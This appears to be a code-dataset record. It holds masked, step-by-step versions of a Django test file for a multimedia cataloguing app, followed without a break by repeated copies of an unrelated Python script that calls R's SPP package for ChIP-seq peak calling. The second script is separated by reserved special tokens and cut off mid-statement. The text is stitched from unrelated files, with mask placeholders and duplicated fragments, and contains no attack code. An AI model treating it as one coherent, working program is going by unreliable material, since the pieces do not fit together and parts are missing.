"step-3": "<mask token>\n\n\ndef minimal_form_data():\n \"\"\"\n Define a minimal fields for submit a media form\n \"\"\"\n form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',\n 'media_type': '1',\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}\n return form_data\n\n\n<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/')\n self.assertContains(response, 'Midia de teste (BR1.1')\n self.assertNotContains(response, 'Media de prueba (PY3.1)')\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-4": "<mask token>\n\n\ndef minimal_form_data():\n \"\"\"\n Define a minimal fields for submit a media form\n \"\"\"\n form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',\n 'media_type': '1',\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}\n return form_data\n\n\ndef complete_form_data():\n \"\"\"\n Define missing fields for a valid submission of media object\n \"\"\"\n missing_fields = {'link': 'http://www.youtube.com', 'publication_date':\n '01/12/2015', 'main-descriptor-content_type-object_id-TOTAL_FORMS':\n '1', 'main-descriptor-content_type-object_id-0-id': '',\n 'main-descriptor-content_type-object_id-0-text': 'malaria',\n 'main-descriptor-content_type-object_id-0-code': '^d8462',\n 'main-descriptor-content_type-object_id-0-status': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '1',\n 'main-resourcethematic-content_type-object_id-0-thematic_area': '1',\n 'main-resourcethematic-content_type-object_id-0-status': '0'}\n complete_form_data = minimal_form_data()\n complete_form_data.update(missing_fields)\n return complete_form_data\n\n\ndef create_media_object():\n \"\"\"\n Create media object for tests\n \"\"\"\n media1 = Media.objects.create(status=0, title='Midia de teste (BR1.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=1,\n cooperative_center_code='BR1.1')\n media_ct = ContentType.objects.get_for_model(media1)\n descriptor = Descriptor.objects.create(object_id=1, content_type=\n media_ct, text='malaria')\n thematic = ResourceThematic.objects.create(object_id=1, content_type=\n media_ct, thematic_area_id=1)\n media2 = Media.objects.create(status=0, title='Media de prueba (PY3.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=2,\n cooperative_center_code='PY3.1')\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/')\n self.assertContains(response, 'Midia de teste (BR1.1')\n self.assertNotContains(response, 'Media de prueba (PY3.1)')\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-5": "# coding: utf-8\n\nfrom django.test.client import Client\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom main.models import Descriptor, ResourceThematic, ThematicArea\n\nfrom utils.tests import BaseTestCase\nfrom models import *\n\ndef minimal_form_data():\n '''\n Define a minimal fields for submit a media form\n '''\n\n form_data = {\n 'status': '0',\n 'title': 'Foto 1',\n 'description': 'Foto 1',\n 'media_type' : '1',\n\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0',\n }\n\n return form_data\n\ndef complete_form_data():\n '''\n Define missing fields for a valid submission of media object\n '''\n\n missing_fields = {\n 'link' : 'http://www.youtube.com',\n 'publication_date' : '01/12/2015',\n\n 'main-descriptor-content_type-object_id-TOTAL_FORMS' : '1',\n\n 'main-descriptor-content_type-object_id-0-id' : '',\n 'main-descriptor-content_type-object_id-0-text' : 'malaria',\n 'main-descriptor-content_type-object_id-0-code' : '^d8462',\n 'main-descriptor-content_type-object_id-0-status' : '0',\n\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS' : '1',\n 'main-resourcethematic-content_type-object_id-0-thematic_area' : '1',\n 'main-resourcethematic-content_type-object_id-0-status' : '0',\n }\n\n complete_form_data = minimal_form_data()\n complete_form_data.update(missing_fields)\n\n return complete_form_data\n\n\ndef create_media_object():\n '''\n Create media object for tests\n '''\n\n # Create a Media object and test that is present on list\n media1 = Media.objects.create(status=0,title='Midia de teste (BR1.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=1,\n cooperative_center_code='BR1.1')\n\n media_ct = ContentType.objects.get_for_model(media1)\n descriptor = Descriptor.objects.create(object_id=1, content_type=media_ct, text='malaria')\n thematic = ResourceThematic.objects.create(object_id=1, content_type=media_ct, thematic_area_id=1)\n\n media2 = Media.objects.create(status=0,title='Media de prueba (PY3.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=2,\n cooperative_center_code='PY3.1')\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n\n # create auxiliary models used on tests\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1', name='Teste')\n\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n response = self.client.get('/multimedia/')\n self.assertContains(response, \"Midia de teste (BR1.1\")\n\n # list only medias from user cooperative center (BR1.1)\n self.assertNotContains(response, \"Media de prueba (PY3.1)\")\n\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n\n # invalid submission with missing required fields\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data )\n\n self.assertContains(response,'Por favor verifique os campos obrigatórios')\n self.assertContains(response,'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,'Você precisa selecionar pelo menos uma área temática')\n\n # complete form_data with required fields and re-submit form\n form_data = complete_form_data()\n\n # test valid submission\n # after submit a valid content the view will redirect to /multimedia and list the objects\n # follow=True will allow check if the new data is on the list\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, \"Foto 1\")\n\n # check if is set cooperative center code of user (editor = BR1.1)\n self.assertEquals(Media.objects.all()[0].cooperative_center_code, \"BR1.1\")\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n\n # Test if return form with fields\n self.assertContains(response, media_test.title)\n\n # Test changes values and submit\n form_data = complete_form_data()\n form_data['status'] = '1'\n\n response = self.client.post(url, form_data)\n # check for validation of descriptor and thematic area for status = Admitted\n self.assertContains(response, \"é necessário ter pelo menos um descritor\")\n\n # check for normal edition\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, \"Foto 1\")\n\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, \"Você tem certeza que deseja apagar?\")\n\n response = self.client.post('/multimedia/delete/1')\n\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count() == 0)\n\n self.assertRedirects(response, '/multimedia/')\n\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n\n # check if documentalist has access to list media-types\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/' )\n\n # 403 = unauthorized\n self.assertEqual(response.status_code, 403)\n\n self.client.logout()\n self.login_admin()\n\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, \"Video\")\n\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n\n # check if documentalist has access to create new media-types\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new' )\n\n # 403 = unauthorized\n self.assertEqual(response.status_code, 403)\n\n self.client.logout()\n self.login_admin()\n\n form_data = {\n 'status': '0',\n 'acronym': 'foto',\n 'name': 'Foto',\n 'language' : 'pt-br',\n 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0',\n }\n\n response = self.client.post('/multimedia/media-type/new', form_data, follow=True )\n\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, \"Foto\")\n\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n\n # Create a media collection object and test that is present on list\n MediaCollection.objects.create(name='Coleção 1',\n description='Coleção de teste 1',\n created_by_id=1, cooperative_center_code='BR1.1')\n\n MediaCollection.objects.create(name='Coleção 2',\n description='Coleção de teste 2',\n created_by_id=2, cooperative_center_code='BR1.1')\n\n MediaCollection.objects.create(name='Coleção 3',\n description='Coleção de teste 3',\n created_by_id=3, cooperative_center_code='PY3.8')\n\n\n response = self.client.get('/multimedia/collections')\n # check if only one collection is returned (restrict by user)\n self.assertContains(response, \"Coleção 1\")\n self.assertEquals(response.context['object_list'].count(), 3)\n\n # check if return only colections from cooperative center BR1.1\n response = self.client.get('/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n\n form_data = {\n 'name': 'Coleção nova',\n 'description': 'Coleção de teste',\n 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0',\n }\n\n response = self.client.post('/multimedia/collection/new', form_data, follow=True )\n\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, \"Coleção nova\")\n",
"step-ids": [
8,
9,
12,
14,
16
]
}
|
[
8,
9,
12,
14,
16
] |
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
<|reserved_special_token_0|>
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
<|reserved_special_token_0|>
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
SPPPeak = collections.namedtuple('SPPPeak',
'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'
)
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
